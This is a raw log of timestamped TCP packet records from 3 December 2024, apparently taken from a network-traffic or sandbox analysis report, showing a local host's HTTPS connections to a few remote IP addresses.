                                                                                                                      Dec 3, 2024 08:55:18.198478937 CET49852443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.198483944 CET4434985213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.269603968 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.270200014 CET49851443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.270227909 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.270700932 CET49851443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.270708084 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.286338091 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.286854982 CET49853443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.286895037 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.287281990 CET49853443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.287286997 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.287507057 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.287842035 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.287864923 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.288266897 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.288275957 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.398050070 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.398399115 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.398422956 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.399430990 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.399509907 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.399821997 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.399878979 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.400355101 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.400363922 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.449443102 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.624663115 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.624933958 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.624946117 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.625231981 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.625520945 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.625562906 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.625639915 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.636040926 CET4434985213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.636128902 CET4434985213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.636185884 CET49852443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.638356924 CET49852443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.638370037 CET4434985213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.638381004 CET49852443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.638386011 CET4434985213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.641783953 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.641813040 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.641896963 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.642096996 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.642110109 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.667330027 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.715667963 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.715734959 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.715806007 CET49851443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.716047049 CET49851443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.716059923 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.716068983 CET49851443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.716073036 CET4434985113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.719034910 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.719054937 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.719125986 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.719276905 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.719289064 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.731348991 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.731411934 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.731463909 CET49853443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.731580973 CET49853443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.731601000 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.731616020 CET49853443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.731621981 CET4434985313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.734205008 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.734220028 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.734311104 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.734460115 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.734472990 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.738020897 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.738082886 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.738131046 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.738214016 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.738224030 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.738234043 CET49842443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.738238096 CET4434984213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.740160942 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.740194082 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.740264893 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.740401030 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:18.740412951 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.812658072 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.812947989 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.812957048 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.813958883 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.814022064 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.814342976 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.814404011 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.814506054 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.814512968 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.834494114 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.834841967 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.834852934 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.835727930 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.835799932 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.836137056 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.836193085 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.836282015 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.836287975 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:18.858954906 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.888058901 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:18.918836117 CET4976880192.168.2.4208.95.112.1
                                                                                                                      Dec 3, 2024 08:55:19.038764000 CET8049768208.95.112.1192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.078339100 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.078707933 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.078730106 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.079659939 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.079734087 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.080041885 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.080104113 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.080215931 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.080233097 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.122287989 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.248984098 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.249008894 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.249017000 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.249075890 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.249104023 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.293919086 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.468786001 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.468812943 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.468919039 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.468930960 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.480097055 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.480844021 CET49859443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.480882883 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.481327057 CET49859443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.481333971 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.492599964 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.492609978 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.492639065 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.492682934 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.492727041 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.506390095 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.506398916 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.506494999 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.512010098 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.523988962 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.523997068 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.524101019 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.542123079 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.542130947 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.542205095 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.542221069 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.542278051 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.542748928 CET49854443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.542766094 CET44349854196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.543245077 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.543278933 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.543365955 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.545695066 CET49865443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.545713902 CET44349865196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.645925999 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.645952940 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.646020889 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.646023989 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.646069050 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.646925926 CET49856443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.646938086 CET44349856196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.647511959 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.647545099 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.647614956 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.648227930 CET49866443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.648241043 CET44349866196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.677669048 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.677690029 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.677697897 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.677721024 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.677772045 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.677788973 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.677812099 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.711038113 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.711047888 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.711147070 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.717191935 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.717504978 CET49860443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.717538118 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.717874050 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.718178988 CET49860443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.718256950 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.718338966 CET49860443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.724843979 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.724921942 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.730667114 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.748805046 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.748881102 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.763340950 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.766736984 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.766814947 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.920942068 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.920953035 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.920986891 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.921016932 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.921067953 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.922549963 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.922565937 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.922571898 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.922640085 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.922665119 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.924451113 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.924515009 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.924568892 CET49859443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.924810886 CET49859443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.924830914 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.924841881 CET49859443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.924846888 CET4434985913.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.927839041 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.927874088 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.927942991 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.928100109 CET49867443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:19.928122044 CET4434986713.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.935863018 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.935872078 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.935951948 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.953933954 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.953944921 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.954063892 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.962059975 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.962136984 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.965734005 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.971910954 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.971919060 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.971977949 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.972002029 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.972048044 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.972453117 CET49857443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.972464085 CET44349857196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.974240065 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.974315882 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.974320889 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:19.974364996 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.974947929 CET49855443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:19.974956036 CET44349855196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.194329977 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.194339037 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.194439888 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.208096981 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.208105087 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.208194971 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.226152897 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.226161957 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.226273060 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.248651028 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.248660088 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.248747110 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.444789886 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.444798946 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.444916964 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.458329916 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.458422899 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.462213039 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.462898970 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.462934971 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.463471889 CET49861443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.463478088 CET4434986113.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.473232031 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.473309994 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.489487886 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.489583969 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.498799086 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.499804974 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.499825001 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.500297070 CET49862443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.500303030 CET4434986213.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.503397942 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.503474951 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.515006065 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.515449047 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.515465975 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.515917063 CET49863443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.515922070 CET4434986313.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.523226976 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.523299932 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.538378000 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.538470984 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.553320885 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.553406000 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.560683966 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.560765982 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.560817957 CET49860443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.562827110 CET49860443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.562844992 CET44349860196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.585036993 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.585603952 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.585634947 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.586137056 CET49864443192.168.2.413.107.246.63
                                                                                                                      Dec 3, 2024 08:55:20.586143017 CET4434986413.107.246.63192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.696875095 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.696978092 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.702774048 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.702860117 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.709377050 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.709450006 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.718378067 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.718466997 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.723841906 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.723912954 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.730882883 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.730966091 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.737468004 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.737539053 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.746350050 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.746421099 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.753189087 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.753268957 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.760051012 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.760126114 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.762386084 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.762454987 CET49858443192.168.2.4196.22.142.143
                                                                                                                      Dec 3, 2024 08:55:20.762460947 CET44349858196.22.142.143192.168.2.4
                                                                                                                      Dec 3, 2024 08:55:20.762509108 CET49858443192.168.2.4196.22.142.143
